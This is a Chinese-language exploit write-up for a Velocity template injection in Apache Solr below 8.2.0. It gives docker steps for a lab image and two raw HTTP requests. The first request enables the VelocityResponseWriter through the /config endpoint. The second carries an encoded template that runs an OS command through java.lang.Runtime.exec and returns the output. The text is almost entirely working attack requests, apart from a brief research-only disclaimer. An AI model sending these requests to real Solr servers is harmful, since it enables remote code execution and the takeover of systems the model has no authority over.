受影響版本
步驟
Apache Solr < 8.2.0
docker pull scxiaotan2/apache-solr:cve-2019-0193 # 拉取鏡像
docker run -it scxiaotan2/apache-solr:cve-2019-0193 /bin/bash #啓動shell
./start.sh #啓動根目錄下的服務
netstat -tlnp #可以看到8983端口啓用了
前提:
攻擊者需要知道Solr服務中Core的名稱才能執行攻擊。
poc
post /solr/core1/config HTTP/1.1
Host: 172.17.0.2:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.0.2/solr
Connection: close
Content-Length: 222
{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }
exp:
post /solr/core1/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 172.17.0.2:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.0.2/solr
Connection: close
Content-Length: 222
{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }
聲明:
本文中提到的漏洞利用Poc和exp僅供研究學習使用,請遵守《網絡安全法》等相關法律法規。
參考鏈接
https://github.com/scxiaotan1/Docker/tree/master/CVE-2019-0193
https://github.com/1135/solr_exploit